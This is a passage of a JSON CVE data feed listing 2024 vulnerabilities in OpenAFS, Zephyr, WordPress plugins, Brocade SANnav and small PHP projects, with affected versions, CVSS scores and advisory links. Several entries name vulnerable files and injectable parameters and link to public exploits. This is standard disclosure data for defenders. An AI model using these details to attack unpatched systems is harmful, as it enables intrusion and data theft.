"cpe:2.3:a:openafs:openafs:1.9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openafs:openafs:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.0", "versionEndExcluding" : "1.6.25", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openafs:openafs:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.8.0", "versionEndExcluding" : "1.8.13", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-14T20:15Z", "lastModifiedDate" : "2025-08-07T18:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10395", "ASSIGNER" : "vulnerabilities@zephyrproject.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hfww-j92m-x8fv", "name" : "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hfww-j92m-x8fv", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hfww-j92m-x8fv", "name" : "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hfww-j92m-x8fv", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "No proper validation of the length of user input in http_server_get_content_type_from_extension." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-03T07:15Z", "lastModifiedDate" : "2025-02-03T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10396", "ASSIGNER" : "patrick@puiterwijk.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://openafs.org/pages/security/OPENAFS-SA-2024-002.txt", "name" : "https://openafs.org/pages/security/OPENAFS-SA-2024-002.txt", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An authenticated user can provide a malformed ACL to the fileserver's StoreACL\nRPC, causing the fileserver to crash, possibly expose uninitialized memory, and\npossibly store garbage data in the audit log.\nMalformed ACLs provided in responses to client FetchACL RPCs can cause client\nprocesses to crash and possibly expose uninitialized memory into other ACLs\nstored on the server." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openafs:openafs:1.9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openafs:openafs:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.0", "versionEndExcluding" : "1.6.25", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openafs:openafs:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.8.0", "versionEndExcluding" : "1.8.13", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-11-14T20:15Z", "lastModifiedDate" : "2025-08-06T19:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10397", "ASSIGNER" : "patrick@puiterwijk.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://openafs.org/pages/security/OPENAFS-SA-2024-003.txt", "name" : "https://openafs.org/pages/security/OPENAFS-SA-2024-003.txt", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A malicious server can crash the OpenAFS cache manager and other client\nutilities, and possibly execute arbitrary code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openafs:openafs:1.9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openafs:openafs:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.0", "versionEndExcluding" : "1.6.25", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openafs:openafs:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.8.0", "versionEndExcluding" : "1.8.13", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-14T20:15Z", "lastModifiedDate" : "2025-08-05T18:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10399", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/03b88862-012a-4dc6-9abb-99dc0d9408fd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/03b88862-012a-4dc6-9abb-99dc0d9408fd?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/download-monitor/tags/5.0.13/src/KeyGeneration/class-dlm-key-generation.php#L266", "name" : "https://plugins.trac.wordpress.org/browser/download-monitor/tags/5.0.13/src/KeyGeneration/class-dlm-key-generation.php#L266", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3178099/download-monitor/trunk/src/KeyGeneration/class-dlm-key-generation.php?contextall=1", "name" : "https://plugins.trac.wordpress.org/changeset/3178099/download-monitor/trunk/src/KeyGeneration/class-dlm-key-generation.php?contextall=1", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_search_users function in all versions up to, and including, 5.0.13. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain usernames and emails of site users." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-30T06:15Z", "lastModifiedDate" : "2024-11-01T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1040", "ASSIGNER" : "ics-cert@hq.dhs.gov" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-327" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Gessler GmbH WEB-MASTER user account is stored using a weak hashing algorithm. The attacker can restore the passwords by breaking the hashes stored on the device." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:gesslergmbh:web-master_firmware:7.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:gesslergmbh:web-master:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-01T22:15Z", "lastModifiedDate" : "2025-08-07T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10400", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3186319/tutor", "name" : "https://plugins.trac.wordpress.org/changeset/3186319/tutor", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcf37d4e-e94a-4046-9949-c208e4e70197?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcf37d4e-e94a-4046-9949-c208e4e70197?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the ‘rating_filter’ parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.7.6", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-21T11:15Z", "lastModifiedDate" : "2025-01-23T17:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10401", "ASSIGNER" : "hp-security-alert@hp.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-16T02:15Z", "lastModifiedDate" : "2025-01-16T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10402", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3169243/", "name" : "https://plugins.trac.wordpress.org/changeset/3169243/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/be1d9d2b-cbdf-4d62-85fe-2616eaf02848?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/be1d9d2b-cbdf-4d62-85fe-2616eaf02848?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.35.1. This makes it possible for authenticated attackers, with Contributor-level access and above, and permissions granted by an Administrator, to create new or edit existing forms, including updating the default registration role to Administrator on User Registration forms." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpmudev:forminator_forms:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-26T12:15Z", "lastModifiedDate" : "2025-02-05T15:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10403", "ASSIGNER" : "sirt@brocade.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-552" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25145", "name" : "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25145", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Brocade Fabric OS versions before \n8.2.3e2, versions 9.0.0 through 9.2.0c, and 9.2.1 through 9.2.1a can \ncapture the SFTP/FTP server password used for a firmware download \noperation initiated by SANnav or through WebEM in a weblinker core dump \nthat is later captured via supportsave." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:broadcom:fabric_operating_system:*:*:*:*:*:*:*:*", "versionEndExcluding" : "9.2.0c1", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:broadcom:fabric_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.2.1", "versionEndExcluding" : "9.2.1a1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-11-21T11:15Z", "lastModifiedDate" : "2025-02-04T15:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10404", "ASSIGNER" : "sirt@brocade.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25403", "name" : "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25403", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "CalInvocationHandler in Brocade \nSANnav before 2.3.1b logs sensitive information in clear text. The \nvulnerability could allow an authenticated, local attacker to view \nBrocade Fabric OS switch sensitive information in clear text. An \nattacker with administrative privileges could retrieve sensitive \ninformation including passwords; SNMP responses that contain AuthSecret \nand PrivSecret after collecting a “supportsave” or getting access to an \nalready collected “supportsave”. NOTE: this issue exists because of an incomplete fix for CVE-2024-29952" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-14T04:15Z", "lastModifiedDate" : "2025-02-14T04:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10405", "ASSIGNER" : "sirt@brocade.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25402", "name" : "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25402", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Brocade SANnav before SANnav 2.3.1b \nenables weak TLS ciphers on ports 443 and 18082. In case of a successful\n exploit, an attacker can read Brocade SANnav data stream that includes \nmonitored Brocade Fabric OS switches performance data, port status, \nzoning information, WWNs, IP Addresses, but no customer data, no \npersonal data and no secrets or passwords, as it travels across the \nnetwork." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-15T00:15Z", "lastModifiedDate" : "2025-02-15T00:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10406", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/K1nako0/tmp_vuln7/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln7/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.281936", "name" : "VDB-281936 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281936", "name" : "VDB-281936 | SourceCodester Petrol Pump Management Software edit_fuel.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431335", "name" : "Submit #431335 | SourceCodester Petrol Pump Management Software 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. Affected by this issue is some unknown functionality of the file /admin/edit_fuel.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:petrol_pump_management:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-26T22:15Z", "lastModifiedDate" : "2024-10-29T20:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10407", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/K1nako0/tmp_vuln8/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln8/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.281937", "name" : "VDB-281937 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281937", "name" : "VDB-281937 | SourceCodester Petrol Pump Management Software edit_customer.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431336", "name" : "Submit #431336 | SourceCodester Petrol Pump Management Software 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in SourceCodester Petrol Pump Management Software 1.0. This affects an unknown part of the file /admin/edit_customer.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:petrol_pump_management:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T00:15Z", "lastModifiedDate" : "2024-10-29T20:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10408", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/46090516ba1b13fe3d2607ab4c0114f1", "name" : "https://gist.github.com/higordiego/46090516ba1b13fe3d2607ab4c0114f1", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281938", "name" : "VDB-281938 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281938", "name" : "VDB-281938 | code-projects Blood Bank Management abs.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431491", "name" : "Submit #431491 | code-projects Blood Bank Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in code-projects Blood Bank Management up to 1.0 and classified as critical. This vulnerability affects unknown code of the file /abs.php. The manipulation of the argument search leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T03:15Z", "lastModifiedDate" : "2024-10-29T20:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10409", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/5f927c5e0502b4ec31b3f7ef12556942", "name" : "https://gist.github.com/higordiego/5f927c5e0502b4ec31b3f7ef12556942", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281939", "name" : "VDB-281939 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281939", "name" : "VDB-281939 | code-projects Blood Bank Management accept.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431494", "name" : "Submit #431494 | code-projects Blood Bank Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Blood Bank Management 1.0 and classified as critical. This issue affects some unknown processing of the file /file/accept.php. The manipulation of the argument reqid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T03:15Z", "lastModifiedDate" : "2024-10-29T20:42Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1041", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/wp-radio/", "name" : "https://wordpress.org/plugins/wp-radio/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/486ffdc9-a3e7-4f4c-89b1-b668a5d41aa5?source=cve", "name" : 